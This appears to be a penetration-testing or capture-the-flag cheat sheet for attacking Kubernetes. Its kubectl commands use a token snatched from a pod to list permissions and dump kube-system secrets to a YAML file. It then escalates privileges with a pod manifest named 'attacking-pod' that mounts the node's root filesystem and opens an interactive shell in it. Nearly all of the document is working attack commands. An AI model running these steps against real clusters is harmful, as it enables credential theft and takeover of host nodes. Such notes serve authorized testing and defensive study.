# Kubernetes * Check [kubeletctl](https://github.com/cyberark/kubeletctl.git) as well ## Account Token * Snatch an account token from inside a pod * Use it via kubectl, watch out for authorizations and namespaces ```sh kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 auth can-i --list kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get namespaces ``` * Save secrets from namespaces as yaml file ```sh kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -o yaml -n kube-system > kube-system.yml kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets -n kube-system ``` * Specify secret ```sh kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get secrets flag -n kube-system -o yaml ``` ## Privilege Escalation * [appsecco's blog](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) * Show images via ```sh kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pods kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get pod -o yaml kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 get nodes -o yaml ``` * Use a found image to create the following yaml file ```yaml apiVersion: v1 kind: Pod metadata: name: attacking-pod spec: containers: - image: name: command: [ "/bin/sh", "-c", "--" ] args: [ "while true; do sleep 30; done;" ] volumeMounts: - mountPath: /host name: host volumes: - name: host hostPath: path: / type: Directory ``` * `/` of the node is mounted to `/host` inside the new pod * Create the pod via ```sh kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 apply -f ``` * Run an interactive session on the pod ```sh kubectl --token $KUBE_TOKEN --insecure-skip-tls-verify --server=https://$TARGET_IP:6443 exec -it attacking-pod -- /bin/bash ```